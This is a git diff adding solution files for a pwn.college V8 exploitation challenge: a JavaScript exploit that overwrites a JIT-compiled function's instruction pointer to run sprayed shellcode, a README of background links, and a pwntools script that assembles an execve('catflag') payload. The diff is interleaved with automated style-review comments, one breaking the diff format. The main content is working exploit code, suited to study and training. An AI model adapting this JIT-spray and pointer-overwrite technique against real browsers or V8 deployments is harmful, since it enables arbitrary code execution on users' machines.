diff --git a/JavaScript/PwnCollegeV8Exploitation/Level2/Exploit.js b/JavaScript/PwnCollegeV8Exploitation/Level2/Exploit.js
new file mode 100644
index 0000000..79a44df
--- /dev/null
+++ b/JavaScript/PwnCollegeV8Exploitation/Level2/Exploit.js
@@ -0,0 +1,45 @@
+// Integrated Builtin:
+// - int32 GetAddressOf(obj);
+// - int32 ArbRead32(int32 cage_addr);
+// - void ArbWrite32(int32 cage_addr, int32 value);
+
+// To execute shellcode, we need JIT spray instead of writing RWX segment.
+// Because we cannot write in the 64-bit address space.
+
+// RWXAddr: Function -> code(+0xC) -> instruction_start(+0x14)
+// JIT Spray Double Constant Offset: RWXAddr + 0x6B
+
+function shellcode() {
+ // JIT spray machine code form of `execve("catflag", NULL, NULL)`
+ return [
+ 1.9995716422075807e-246,
+ 1.9710255944286777e-246,
+ 1.97118242283721e-246,
+ 1.971136949489835e-246,
+ 1.9711826272869888e-246,
+ 1.9711829003383248e-246,
+ -9.254983612527998e+61
+ ];
+}
+for (let i = 0; i < 100000; i++) shellcode(); // Trigger MAGLEV compilation
+
+function unptr(v) {
+ return v & 0xfffffffe;
+}
+
+function ptr(v) {
+ return v | 1;
+}
+
+let shellcode_addr = GetAddressOf(shellcode);
+console.log("Address of shellcode: " + shellcode_addr.toString(16));
+let code_addr = unptr(ArbRead32(shellcode_addr + 0xC));
+console.log("Address of code: " + code_addr.toString(16));
+let instruction_start_addr = code_addr + 0x14;
+let instruction_start = ArbRead32(instruction_start_addr);
+console.log("instruction_start: " + instruction_start.toString(16));
+ArbWrite32(instruction_start_addr, instruction_start + 0x6B);
+shellcode();
+
+// %DebugPrint(shellcode);
+// %SystemBreak();
\ No newline at end of file
diff --git a/JavaScript/PwnCollegeV8Exploitation/Level2/README.md b/JavaScript/PwnCollegeV8Exploitation/Level2/README.md
new file mode 100644
index 0000000..1907fee
--- /dev/null
+++ b/JavaScript/PwnCollegeV8Exploitation/Level2/README.md
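Review bot: `ptr` is declared but never called anywhere in this file, so it is dead code; either drop it or add a comment saying why it is kept next to `unptr`. The `let` bindings shellcode_addr, code_addr, instruction_start_addr and instruction_start are never reassigned and should be `const`. The three `console.log` calls build their output with `+` concatenation where template literals would read more clearly. The offsets 0xC, 0x14 and 0x6B are explained only in the header comment; naming them (for example `const CODE_OFFSET = 0xC;`) keeps the explanation next to the value it describes.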
@@ -0,0 +1,20 @@
+# Level 2
+
+## Problem
+
+Given the following primitves:
+- AddressOf
+- Arbitrary Read & Write in Sandbox
+
+## Key Knowledge
+
+- [Pointer Compression in V8](https://v8.dev/blog/pointer-compression)
+- V8 Optimization Tiers
+ - [Intepreter Ignition](https://v8.dev/blog/sparkplug)
+ - [Non-optimizing JavaScript compiler Sparkplug](https://v8.dev/blog/sparkplug)
+ - [Mid-tier optimizing compiler Maglev](https://v8.dev/blog/maglev)
+ - Top-tier optimizing compiler [Turbofan](https://v8.dev/docs/turbofan) / [Turboshaft](https://v8.dev/blog/holiday-season-2023)
+- [V8 Native Syntaxs](https://v8.dev/docs/builtin-functions)
+ - [V8引擎漏洞分析环境与调试方法基础](https://gtoad.github.io/2019/07/25/V8-Debug/)
+- [JIT Spray in V8](https://www.matteomalvica.com/blog/2024/06/05/intro-v8-exploitation-maglev/#jit-spraying-shellcode)
+- [Shellcraft of Pwntools](https://docs.pwntools.com/en/stable/shellcraft/amd64.html)
diff --git a/JavaScript/PwnCollegeV8Exploitation/ShellCode/Level2_catflag_V8JITSpray.py b/JavaScript/PwnCollegeV8Exploitation/ShellCode/Level2_catflag_V8JITSpray.py
new file mode 100644
index 0000000..5cefcf1
--- /dev/null
+++ b/JavaScript/PwnCollegeV8Exploitation/ShellCode/Level2_catflag_V8JITSpray.py
@@ -0,0 +1,46 @@
+from pwn import context, shellcraft
+from common import *
+context(arch = 'amd64', os = 'linux')
+
+# execve("catflag", NULL, NULL)
+
+assembly = f"""
+/* Craft envp to rdx */
+xor rdx, rdx /* 3 */
+/* Craft argv to rsi */
+xor rsi, rsi /* 3 */
+jmp (. + 0x2) + 0xc /* 2 */
+/* Craft pathname to rdi */
+mov eax, 0x0067616c /* 5 */
+nop
+jmp (. + 0x2) + 0xc /* 2 */
+
+shl rax, 32 /* 4 */
+nop
+nop
+jmp (. + 0x2) + 0xc /* 2 */
+
+mov ebx, 0x66746163 /* 5 */
+nop
+jmp (. + 0x2) + 0xc /* 2 */
+
+or rax, rbx /* 3 */
+push rax /* 1 */
+nop
+nop
+jmp (. + 0x2) + 0xc /* 2 */
+
+mov rdi, rsp /* 3 */
+nop
+nop
+nop
+jmp (. + 0x2) + 0xc /* 2 */
+
+/* syscall execve */
+{shellcraft.amd64.linux.syscall("SYS_execve", "rdi", "rsi", "rdx")} /* 5 */
+int3 /* 1 */
+int3 /* 1 */
+int3 /* 1 */
+""".strip()
+
+dump_machine_code(assembly)
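Review bot: `from common import *` on the second line hides where `dump_machine_code` comes from and pulls every public name of `common` into this module; `from common import dump_machine_code` documents the one dependency the script actually uses. The `context(...)` call on the following line puts spaces around `=` in keyword arguments, which PEP 8 discourages: `context(arch='amd64', os='linux')`. The `/* N */` byte-count annotations inside the assembly string are the only explanation of the `nop` padding; a short comment above `assembly` describing the padding scheme would make that intent explicit to a reader.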